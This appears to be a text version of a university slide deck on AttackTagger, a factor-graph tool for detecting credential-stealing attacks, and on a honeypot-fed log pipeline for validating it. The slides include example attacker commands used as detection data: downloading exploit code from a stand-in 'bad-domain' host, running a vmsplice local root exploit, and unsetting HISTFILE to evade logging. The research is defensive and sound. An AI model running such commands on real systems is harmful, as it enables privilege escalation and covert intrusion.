
Scalable Data Analytics Pipeline for Validation of Real-Time Attack Detection
Eric Badger, Phuong Cao, Alex Withers, Adam Slagell, Zbigniew Kalbarczyk, Ravi Iyer
University of Illinois Urbana-Champaign

Overview
▪ Introduction/Motivation
▪ Challenges
▪ Attack Detection: AttackTagger
▪ Validation of AttackTagger
▪ Future Work/Conclusion

Research Problems
▪ How can we detect attacks before system misuse?
  ▪ High-accuracy, real-time attack detection tools
▪ How do we validate that our attack detection tools work on real-world data?
▪ How do we transition attack detection tools from theory to practice?

Attack Type: Credential-Stealing Attacks
▪ Definition: An attack where the attacker enters the system with legitimate credentials (e.g. username/password)
  ▪ Attacker becomes an insider
▪ 26% (32/124) of incidents at NCSA over a 5-year period were credential-stealing attacks
▪ 28% (9/32) of these attacks weren't detected by NCSA monitors
[1] Sharma, A.; Kalbarczyk, Z.; Barlow, J.; Iyer, R., "Analysis of security data from a large computing organization," in Dependable Systems & Networks (DSN), 2011 IEEE/IFIP 41st International Conference on

Example Credential-Stealing Attack
[Figure labels: Legitimate Users, Attacker, Firewall, OpenSSH, Target System, Monitors]
▪ Credentials obtained through: social engineering, email phishing, password guessing
  alice : password123
  bob : password456
  …
▪ 1. Login remotely
  sshd: Accepted <user> from <remote>
▪ 2. OS fingerprinting
  $ uname -a; w
  Linux 2.6.xx, up 1:17, 1 user
  USER TTY LOGIN@ IDLE
  xxx console 18:40 1:16
▪ 3. Download exploit
  $ wget server6.bad-domain.com/vm.c
  Connecting to xx.yy.zz.tt:80… connected.
  HTTP 1.1 GET /vm.c 200 OK
▪ 4. Escalate privilege
  $ gcc vm.c -o a; ./a
  Linux vmsplice Local Root Exploit
  [+] mmap: 0xAABBCCDD
  [+] page: 0xDDEEFFGG
  …
  # whoami
  root
▪ 5. Replace SSH daemon
  sshd: Received SIGHUP; restarting.
▪ Monitors: Bro IDS, Syslog, File Integrity Monitor

Detecting Attacks Using Factor Graphs: AttackTagger
[Figure: factor graph over time. Raw logs are mapped to events, and factor functions relate events to user states (benign, suspicious, malicious).]
▪ Raw logs and the events extracted from them:
  ▪ sshd: Accepted <user> → LOGIN_REMOTELY
  ▪ $ uname -a; w → OS_FINGERPRINT
  ▪ $ wget bad-domain.com/vm.c → DOWNLOAD_SENSITIVE
  ▪ $ gcc vm.c -o a; ./a → COMPILE
  ▪ sshd: Received SIGHUP; restarting. → RESTART SYS SERVICE
▪ User states over time: benign, suspicious, suspicious, malicious, malicious
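To make the idea of factor functions concrete, here is a minimal sketch, not AttackTagger itself. It assumes a simple chain model with two hypothetical factor types: one scoring how well a user state fits an event, and one scoring the transition between consecutive states. All weights are invented for illustration, `RESTART_SYS_SERVICE` is the slide's "RESTART SYS SERVICE" written as an identifier, and the search is brute force over every state sequence.

```python
from itertools import product

STATES = ("benign", "suspicious", "malicious")
RANK = {state: i for i, state in enumerate(STATES)}

# Hypothetical event factors: compatibility of each event with each user state.
# The weights are made up for this sketch; they are not AttackTagger's values.
EVENT_FACTOR = {
    "LOGIN_REMOTELY":      {"benign": 1.0, "suspicious": 0.2, "malicious": 0.0},
    "OS_FINGERPRINT":      {"benign": 0.3, "suspicious": 1.0, "malicious": 0.2},
    "DOWNLOAD_SENSITIVE":  {"benign": 0.0, "suspicious": 1.0, "malicious": 0.6},
    "COMPILE":             {"benign": 0.2, "suspicious": 0.5, "malicious": 1.0},
    "RESTART_SYS_SERVICE": {"benign": 0.1, "suspicious": 0.3, "malicious": 1.0},
}


def transition_factor(prev_state, cur_state):
    """Hypothetical factor: reward sequences whose severity never decreases."""
    return 0.5 if RANK[cur_state] >= RANK[prev_state] else -1.0


def score(events, states):
    """Sum of all factor values for one candidate state sequence."""
    total = sum(EVENT_FACTOR[e][s] for e, s in zip(events, states))
    total += sum(transition_factor(a, b) for a, b in zip(states, states[1:]))
    return total


def most_likely_states(events):
    """Brute-force search for the highest-scoring state sequence."""
    candidates = product(STATES, repeat=len(events))
    return max(candidates, key=lambda seq: score(events, seq))


events = ["LOGIN_REMOTELY", "OS_FINGERPRINT", "DOWNLOAD_SENSITIVE",
          "COMPILE", "RESTART_SYS_SERVICE"]
print(most_likely_states(events))
```

Brute force is only workable for short event sequences, since the number of candidates grows as 3^n; a real factor-graph tool would use a proper inference algorithm instead.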

How Do I Know What Events Are Important?
▪ We identified over 100 important events related to credential-stealing attacks
[2] P. Cao, K. Chung, Z. Kalbarczyk, R. Iyer, and A. Slagell. Preemptive intrusion detection. HotSoS '14.
[3] P. Cao, E. Badger, Z. Kalbarczyk, R. Iyer, and A. Slagell. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15.

AttackTagger Dataset
▪ Manually extracted data
  ▪ Raw logs
  ▪ Human-written incident reports
▪ Ideal data
  ▪ No noise
  ▪ Perfect monitors
  ▪ No randomness
[3] P. Cao, E. Badger, Z. Kalbarczyk, R. Iyer, and A. Slagell. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15.

Manual Extraction
▪ Raw logs
  11:00:57 sshd: Failed password for root → ALERT_FAILED_PASSWORD
  23:08:26 sshd: Failed password for root → ALERT_FAILED_PASSWORD
  23:08:30 sshd: Failed password for nobody → ALERT_FAILED_PASSWORD
  23:08:38 sshd: Failed password for <user> → ALERT_FAILED_PASSWORD
  23:08:42 sshd: Failed password for root → ALERT_FAILED_PASSWORD
▪ Human-written incident reports
  "The security team received ssh suspicious alerts from <machine> for the user <user>. There were also some Bro alerts from the machine <machine>. From the Bro sshd logs the user ran the following commands:"
  uname -a → READ_HOST_CONFIGURATION
  unset HISTFILE → ALERT_DISABLE_LOGGING
  wget <xx.yy.zz.tt>/abs.c -O a.c → ALERT_DOWNLOAD_SENSITIVE
  gcc a.c -o a; → ALERT_COMPILE_CODE
[3] P. Cao, E. Badger, Z. Kalbarczyk, R. Iyer, and A. Slagell. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15.
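The manual mapping from log lines to event names could in principle be automated with a pattern table. The sketch below is one possible approach, not the authors' extraction method: the event names come from the slide, while the regular expressions and the `extract_event` helper are assumptions made for illustration.

```python
import re

# Event names are taken from the slide; the patterns are hypothetical.
EVENT_PATTERNS = [
    (re.compile(r"sshd: Failed password for \S+"), "ALERT_FAILED_PASSWORD"),
    (re.compile(r"^uname -a\b"), "READ_HOST_CONFIGURATION"),
    (re.compile(r"^unset HISTFILE\b"), "ALERT_DISABLE_LOGGING"),
    (re.compile(r"^wget \S+\.c\b"), "ALERT_DOWNLOAD_SENSITIVE"),
    (re.compile(r"^gcc \S+\.c\b"), "ALERT_COMPILE_CODE"),
]


def extract_event(line):
    """Return the first matching event name, or None if nothing matches."""
    text = line.strip()
    for pattern, event in EVENT_PATTERNS:
        if pattern.search(text):
            return event
    return None


samples = [
    "23:08:26 sshd: Failed password for root",
    "uname -a",
    "unset HISTFILE",
    "wget <xx.yy.zz.tt>/abs.c -O a.c",
    "gcc a.c -o a;",
]
for sample in samples:
    print(sample, "->", extract_event(sample))
```

A table of patterns keeps each rule independent, so new events can be added without touching the matching logic. Lines that match no rule return `None` rather than a guessed label.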

AttackTagger Results
▪ 74.2% (46/62) malicious users correctly detected as malicious
▪ 1.52% (19/1,253) benign users incorrectly detected as malicious
[3] P. Cao, E. Badger, Z. Kalbarczyk, R. Iyer, and A. Slagell. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15.
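The two percentages follow directly from the counts on the slide. A short check, using only those counts (the function name `rate` is ours):

```python
def rate(count, total):
    """Percentage of `count` out of `total`."""
    return 100.0 * count / total


true_positive_rate = rate(46, 62)      # malicious users flagged as malicious
false_positive_rate = rate(19, 1253)   # benign users flagged as malicious
missed_malicious = 62 - 46             # malicious users not detected

print(f"True positive rate:  {true_positive_rate:.1f}%")
print(f"False positive rate: {false_positive_rate:.2f}%")
print(f"Missed malicious users: {missed_malicious}")
```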

How to Extract Important Events
▪ Network Monitors
  ▪ Anything that logs activity between hosts
  ▪ Example: Bro
▪ Host Monitors
  ▪ Anything that logs activity on the host
  ▪ Example: OSSEC

Log Normalization
[Figure: log sources (OSSEC logs, auth logs, RKHunter logs, Bro notice logs, Snoopy logs) and their timestamp formats (ISO 8601, epoch time)]

Log Normalization
▪ Normalized record fields: Timestamp, Received Timestamp, IP Address:User, Event Info, Extra
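As an illustration of what normalization involves, the sketch below converts ISO 8601 and epoch timestamps into one representation and emits a comma-separated record with the fields named on the slide. Choosing epoch seconds as the common format, treating timezone-less timestamps as UTC, the field order, and the sample values (a documentation-range IP address and the user name `alice`) are all assumptions; the slides do not specify them.

```python
from datetime import datetime, timezone


def to_epoch(raw):
    """Convert an epoch string or an ISO 8601 string to epoch seconds."""
    try:
        return float(raw)  # already epoch time
    except ValueError:
        pass
    parsed = datetime.fromisoformat(raw)
    if parsed.tzinfo is None:
        # Assumption: timestamps without a timezone are in UTC.
        parsed = parsed.replace(tzinfo=timezone.utc)
    return parsed.timestamp()


def normalize(timestamp, received, ip, user, event_info, extra=""):
    """Build one record: timestamp, received timestamp, ip:user, event info, extra."""
    return ",".join([
        f"{to_epoch(timestamp):.0f}",
        f"{to_epoch(received):.0f}",
        f"{ip}:{user}",
        event_info,
        extra,
    ])


# Hypothetical sample values, for illustration only.
print(normalize("1970-01-01T00:00:10+00:00", "12",
                "192.0.2.10", "alice", "ALERT_FAILED_PASSWORD"))
```

Once every monitor's output passes through a single conversion function like this, downstream stages no longer need to know which monitor produced a record.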

Log Aggregation
▪ Multiple clients, single server
▪ Encryption is necessary
  ▪ Thwart MITM attacks
[Figure labels: Clients, Server]

Data Pipeline Design
[Figure: pipeline diagram with a row of generic tools and a row of example tools]
▪ Generic tools: Data Source, Monitors, Log Aggregation and Normalization, Message Queue, Log Storage, Data Visualization, Attack Detection
▪ Example tools: Network Traffic/Raw Logs, Honeypots, Bro, Events, AttackTagger

We Need Data! Honeypots at NCSA
▪ NCSA server running several VMs
  ▪ Honeypot VMs
  ▪ Monitoring VM
▪ Collector (NCSA server)
  ▪ Normalize, aggregate, queue, detect
▪ Honeypots are low-risk
[Figure labels: Public Network, Honeypot VMs, Monitoring VM, Logs, Private Network, Collector]

Preliminary Honeypot Results
▪ 3 SSH brute-force attacks in the first 3 days
▪ Downloaded and ran "/tmp/squid64"
▪ Attackers beat my monitors! (Well, sort of...)
  ▪ Pushed the malware
  ▪ Immediate file deletion

Where Are We Now?
▪ Honeypots are online
  ▪ Mining attack data
▪ Creating targeted attacks
▪ Upgrading AttackTagger factor functions
▪ Pipeline performance evaluation underway

Validating AttackTagger in a Real-world Environment
▪ Compare with theoretical AttackTagger results
▪ Compare and contrast AttackTagger with different attack detection models
  ▪ e.g. rule-based classifier, Bayesian networks
▪ Benchmark throughput of events
  ▪ Can AttackTagger work in real-time?
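A throughput benchmark of the kind listed above can be sketched as a simple timing loop. This is an illustrative harness only: `dummy_detector` is a hypothetical stand-in for a real detector, and the event list is synthetic.

```python
import time


def measure_throughput(detector, events):
    """Return events processed per second for one pass over `events`."""
    start = time.perf_counter()
    for event in events:
        detector(event)
    elapsed = time.perf_counter() - start
    return len(events) / elapsed if elapsed > 0 else float("inf")


def dummy_detector(event):
    """Hypothetical stand-in: flags any event whose name starts with ALERT_."""
    return event.startswith("ALERT_")


synthetic_events = ["ALERT_FAILED_PASSWORD", "READ_HOST_CONFIGURATION"] * 5000
rate_per_second = measure_throughput(dummy_detector, synthetic_events)
print(f"{rate_per_second:.0f} events/second")
```

Comparing the measured rate against the rate at which monitors produce events gives a first indication of whether detection can keep up in real time.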

Future Work
▪ Validate AttackTagger using honeypots/pipeline
▪ Transition entire pipeline into practice at NCSA
▪ Add additional monitors to data pipeline
  ▪ Administrator-generated events/profiles
  ▪ Keystroke data (e.g. iSSHD)
▪ Improve stream-processing of AttackTagger

Conclusion
▪ Demonstrated attack detection using factor graphs (AttackTagger)
  ▪ 74.2% true positive rate
▪ Designed and implemented data pipeline for real-world validation of attack detection tools

Questions?

Citations
[1] Sharma, A.; Kalbarczyk, Z.; Barlow, J.; Iyer, R., "Analysis of security data from a large computing organization," in Dependable Systems & Networks (DSN), 2011 IEEE/IFIP 41st International Conference on
[2] Phuong Cao, Key-whan Chung, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam J. Slagell. 2014. Preemptive intrusion detection. In Proceedings of the 2014 Symposium and Bootcamp on the Science of Security (HotSoS '14). ACM, New York, NY, USA, Article 21, 2 pages. DOI=10.1145/2600176.2600197 http://doi.acm.org/10.1145/2600176.2600197
[3] Phuong Cao, Eric Badger, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam Slagell. 2015. Preemptive intrusion detection: theoretical framework and real-world measurements. In Proceedings of the 2015 Symposium and Bootcamp on the Science of Security (HotSoS '15). ACM, New York, NY, USA, Article 5, 12 pages. DOI=10.1145/2746194.2746199 http://doi.acm.org/10.1145/2746194.2746199
